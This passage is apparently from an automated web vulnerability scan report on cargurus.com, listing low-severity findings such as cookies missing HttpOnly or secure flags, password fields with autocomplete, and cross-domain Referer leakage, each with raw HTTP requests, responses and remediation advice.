User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Aug 2008 22:34:07 GMT
Accept-Ranges: bytes
Content-Length: 973
Cache-Control: max-age=31536000
Expires: Mon, 17 Sep 2012 13:13:13 GMT
Content-Type: image/gif
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

GIF89a..................!..+..%..)..*..-..*..1..0..2..6..............9..&.. ..!..,.. ..".."..#..$..3..5..6..7..:..9..9..<..=..>..6..>..E..C..J..@..D..F..E..G..f..%..&..'..)..*..,..-..9..1..5.....0..2.
...[SNIP]...

3.15. http://www.cargurus.com/gfx/mini/star_grey.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /gfx/mini/star_grey.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gfx/mini/star_grey.gif HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Aug 2008 22:34:07 GMT
Accept-Ranges: bytes
Content-Length: 971
Cache-Control: max-age=31536000
Expires: Mon, 17 Sep 2012 13:13:13 GMT
Content-Type: image/gif
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

3.16. http://www.cargurus.com/gfx/mini/star_half_grey.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /gfx/mini/star_half_grey.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gfx/mini/star_half_grey.gif HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Aug 2008 22:34:07 GMT
Accept-Ranges: bytes
Content-Length: 972
Cache-Control: max-age=31536000
Expires: Mon, 17 Sep 2012 13:13:13 GMT
Content-Type: image/gif
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

GIF89a............*..0..2..#..9..C..@..%..'..)..*..,..-..1.....0..2..E..A..D..B..L..G..I..M..H..I..J..[..T..P..P..L..M..W..Z..]..I..T..F..G..A..H..W..V..Y..X..[..]..^.._..^..s..z..`....c.............
...[SNIP]...

3.17. http://www.cargurus.com/js/jquery/easySlider1.7.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /js/jquery/easySlider1.7.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery/easySlider1.7.js?v=-942108628_5728_r259_2 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Apr 2011 21:42:28 GMT
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Mon, 17 Sep 2012 13:13:10 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 5728
Content-Type: application/x-javascript
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

/*
*    Easy Slider 1.7 - jQuery plugin
*    written by Alen Grakalic
*    http://cssglobe.com/post/4004/easy-slider-15-the-easiest-jquery-plugin-for-sliding
*
*    Copyright (c) 2009 Alen Grakalic (http://
...[SNIP]...

3.18. https://www.cargurus.com/Cars/authentication/renderLoginForm.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cars/authentication/renderLoginForm.action?redirectUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26amp%3Bign-modelId-entitySelectingHelper.selectedEntity%3D%26amp%3BentitySelectingHelper.selectedEntity%3Dm4%26amp%3Bzip%3D02110%26amp%3BsourceContext%3DcarGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:36 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:36 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/
Content-Length: 14419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.
...[SNIP]...

3.19. https://www.cargurus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020c=c0a80220:0

Response

HTTP/1.1 302 Found
Date: Sun, 18 Sep 2011 13:13:37 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.cargurus.com/favicon.ico
Content-Length: 302
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.cargurus.com/favicon.ico">here</a>.<
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. https://www.cargurus.com/Cars/authentication/renderLoginForm.action  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Cars/authentication/renderLoginForm.action?redirectUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26amp%3Bign-modelId-entitySelectingHelper.selectedEntity%3D%26amp%3BentitySelectingHelper.selectedEntity%3Dm4%26amp%3Bzip%3D02110%26amp%3BsourceContext%3DcarGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:36 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:36 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/
Content-Length: 14419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.
...[SNIP]...
<div class="loginRegisterForm">


<form id="loginUser" name="loginUser" action="/Cars/authentication/loginUser.action" method="POST">
<table class="wwFormTable">
...[SNIP]...
<td
class="tdContent" ><input type="password" name="loginPassword" id="loginUser_loginPassword"/></td>
...[SNIP]...

4.2. https://www.cargurus.com/Cars/authentication/renderLoginForm.action  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Cars/authentication/renderLoginForm.action?redirectUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26amp%3Bign-modelId-entitySelectingHelper.selectedEntity%3D%26amp%3BentitySelectingHelper.selectedEntity%3Dm4%26amp%3Bzip%3D02110%26amp%3BsourceContext%3DcarGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:36 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:36 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/
Content-Length: 14419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.
...[SNIP]...
<div class="loginRegisterForm">


<form id="registerUser" name="registerUser" action="/Cars/authentication/registerUser.action" method="post">
<table class="wwFormTable">
...[SNIP]...
<td
class="tdContent" ><input type="password" name="person.password" id="registerUser_person_password"/></td>
...[SNIP]...

5. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


5.1. https://www.cargurus.com/Cars/authentication/renderLoginForm.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cars/authentication/renderLoginForm.action?redirectUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26amp%3Bign-modelId-entitySelectingHelper.selectedEntity%3D%26amp%3BentitySelectingHelper.selectedEntity%3Dm4%26amp%3Bzip%3D02110%26amp%3BsourceContext%3DcarGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:36 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:36 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/
Content-Length: 14419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.
...[SNIP]...

5.2. https://www.cargurus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020c=c0a80220:0

Response

HTTP/1.1 302 Found
Date: Sun, 18 Sep 2011 13:13:37 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.cargurus.com/favicon.ico
Content-Length: 302
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.cargurus.com/favicon.ico">here</a>.<
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:09 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:09 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Expires=Fri, 16-Sep-2016 13:13:09 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 143496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ww
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="cg-dealFinder-result-img">


